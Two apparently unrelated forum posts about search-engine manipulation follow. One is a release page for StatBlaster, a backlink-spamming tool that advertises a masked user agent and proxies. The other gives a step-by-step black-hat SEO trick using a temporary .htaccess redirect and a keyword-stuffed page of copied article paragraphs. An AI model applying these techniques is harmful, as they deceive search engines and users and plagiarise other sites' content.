trimming down the list to 2,566 URLs. Keep in mind that you need to extract the entire .rar archive to replace all 4 of your old StatBlaster files while updating. Version 5.1 and Revision 6 are retired and have been removed. Features StatBlaster quickly and efficiently blasts your domain name to thousands of statistics websites. Statistics websites include websites that valuate your domain, provide whois information for your domain, and most importantly-- drop a backlink to your domain. StatBlaster is packed full of features: * Multithreading: StatBlaster can handle up to 100 connections at once, which means that it can blast up to 100 sites simultaneously. * Automatic Pinging: StatBlaster automatically sends every backlink you generate to Ping-o-Matic, which pings 22 services. * Load/Save State: StatBlaster can save your progress into a StatBlaster State (*.sbs), which can be loaded later to resume where you left off. * Smart List Management: StatBlaster automatically sorts and formats websites in your queue, while removing duplicates. * Import Websites: StatBlaster allows you to import a list of your websites to blast. * Stealthy: StatBlaster masks its user agent string and offers proxy support to be indistinguishable from an internet browser. * User Friendly: StatBlaster remembers your settings and also provides help through messages in the status bar. * Fully Client-Sided: StatBlaster doesn't "call back" to any website, and StatBlaster won't stop working if some registration server goes down. You are in total control when you use StatBlaster. * Cross-Platform Compatibility: StatBlaster normally runs on Windows, but can also run on Mac, Linux, and other Unix-like operating systems through Wine. Finally, StatBlaster is available for free, which is hard to beat. Screenshot Download: Statblaster 5.2.rar Includes: StatBlaster 5.2.exe; AutoHotkey.dll; libcurl.dll; urls.txt (Revision 7) http://www.mediafire.com/?nxxt1z5ngl2 Changelog Version 5.2 (2/13/10): Integrated help now shows tooltips Revision 7 (2/13/10): Quality control Version 5.1 (2/7/10): Saves settings in configuration file; Faster performance Revision 6 (2/7/10): Quality control Version 5.0 (2/6/10): Single-process multithreading; Waits for threads to finish before completing submission; Improved pinging; Proxy test changed to connection test; Maximum threads can no longer be changed when paused Version 4.2 (2/4/10): Integrated help through status bar; Proxy test; Improved performance Version 4.1 (2/1/10): Proxy support; Wine Compatibility Mode removed Revision 5 (1/31/10): Added experimental Alexa sites, courtesy of geteasymoneynow Version 4.0 (1/30/10): New submission engine; Taskbar alert Version 3.3 (1/29/10): Improved memory efficiency Revision 4 (1/29/10): Merged list with new source, courtesy of SebastianJu Version 3.2 (1/29/10): Improved submission engine; Alert on completion; Ability to disable website submission Revision 3 (1/29/10): Removed malware-infected sites, courtesy of SebastianJu Version 3.1 (1/26/10): Customizable user agent; Efficiency fix Version 3.0 (1/26/10): Automatic pinging submits backlinks to Ping-o-Matic; Properly formats all addresses in "Your Websites" Version 2.2 (1/24/10): Wine Compatibility Mode adds support for Mac, Linux, and Unix-like systems; Maximum threads increased to 100 Version 2.1 (1/19/10): Loads and saves progress states; Automatically sorts your websites and removes duplicates; Allows adjusting threads while paused; Improved multithreading efficiency; Maximum threads reduced to 99 Revision 2 (1/18/10): Spam and duplicate links removed, courtesy of chowyoungfat Version 2.0 (1/18/10): Multithreading supports up to 999 threads Version 1.3 (1/17/10): Statistics website list is no longer restricted to "urls.txt"; Automatically removes "www." prefix from site address; Improved tray tooltip Version 1.2 (1/16/10): Improved interface; Imports websites from .txt files Revision 1 (1/10/10): New scrape of http://www.1347.com.cn/ with additional links from antx16 Version 1.1 (11/23/09): Handles multiple sites; Automatically removes "http://" prefix from site address Revision 0 (11/22/09): Original release Version 1.0 (11/22/09): Original release License The download comes with four files, each under a different license. * The StatBlaster executable is released under the Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 United States License. * libcurl.dll is released under a MIT/X derivative license. * AutoHotkey.dll (source code) is released under the GNU General Public License, Version 2.0. * urls.txt is released into the public domain. Contact Sycthos via private message to negotiate commercial licensing of the StatBlaster executable. VirusTotal http://www.virustotal.com/analisis/938fe43117c4d10bc4f8153d38ad5255e81c3ea9e18c5d6c85638eea5a27b765-1266081705

Author: newkid.. Here is my 2 cent For one of my domain created one and a half months back, I was ranking good for specific searches. Say if I have reviewed any product, if you search for that product, I rank in the first page. Fair enough, but that does not bring massive traffic because I never did review based on product popularity, instead I just review what I find on my way and that too with no affiliate link and optimized only for adsense (getting 25% CTR ). Lets be more specific, my domain relates to 'Make money online' and 'Work from home' and say I reviewed for website like 'sponsoredreviews', 'payperpost', 'mylot' etc. So if anyone search for these keyword, I always come in first page. I was quite satisfied because its a month old blog. But the click what I was getting is 100/day which was too dull for me. And for the main keyword like 'Make Money online' 'Work from home', 'Home based business'. 'make money guide, I was not ranking in the Top 100 (You know how competitive this keyword is)... And I did something which made my page to come in Top 50 in the first attempt and Top 10 in second attempt. Traffic surged from 100 /day to 3400/day on an average I dont know if I can call it blackhat, but definitely not a white. Give a try for instant result.... what I did: (1) I modified .htaccess file. At the bottom, I added RewriteEngine On RewriteBase / RewriteRule ^(.+)$ / [R=302,L] What it does is, it forward all the internal pages to homepage.. You type anything www.yourdomain.com/****/****.html and it will come to www.yourdomain.com (2) Added one plain HTML page in root directory named 'index.html' (3) Edited that index.html like this a) Title - Your 2 anchor keyword In the body, 2 lines of text filled with your main keyword in <h1> tag c) Search your keyword in google and pick any 3 result from top 10 result and copy the first para of each article d) make this copied article in Bold e) Add <h2> tag with your first Keyword f) go to keyword tool in adword and type your main keyword and see all the relevant keyword coming into result. Note any 10 result (two short keyword, two 3/4 word keyword, six long tail keywords) and add these keywords under <h2> tag defined above and keep it in <h3> tag g) Now repeat the steps (e) and (f) for your second Keyword (anchor text) (4) Ping your blog through pingler and pingthatblog (5) Leave it for a day (6) after 24 hours, remove that added line in .htaccess file and rename or delete index.html file added into the root directory